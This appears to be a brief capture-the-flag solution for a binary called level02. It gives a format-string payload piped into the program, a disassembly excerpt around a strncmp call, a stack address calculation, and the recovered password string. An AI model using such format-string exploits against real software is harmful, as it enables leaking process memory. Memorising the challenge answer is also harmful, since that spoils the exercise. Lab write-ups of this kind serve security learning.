echo -en '%.0s%.0s%.0s%.0s%.0s%.0s%.0sTarget [%s]\n\x30\xe5\xff\xff\xff\x7f\x00\x00' | ./level02

  400a4a:	48 8d 8d f0 fe ff ff 	lea    -0x110(%rbp),%rcx # Input
  400a51:	48 8d 85 60 ff ff ff 	lea    -0xa0(%rbp),%rax # Target
  400a58:	ba 29 00 00 00       	mov    $0x29,%edx
  400a5d:	48 89 ce             	mov    %rcx,%rsi
  400a60:	48 89 c7             	mov    %rax,%rdi
  400a63:	e8 08 fc ff ff       	callq  400670 <strncmp@plt>

Input: 0x007fffffffe4c0
+ (0x110 - 0xa0) =
0x007fffffffe530

Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
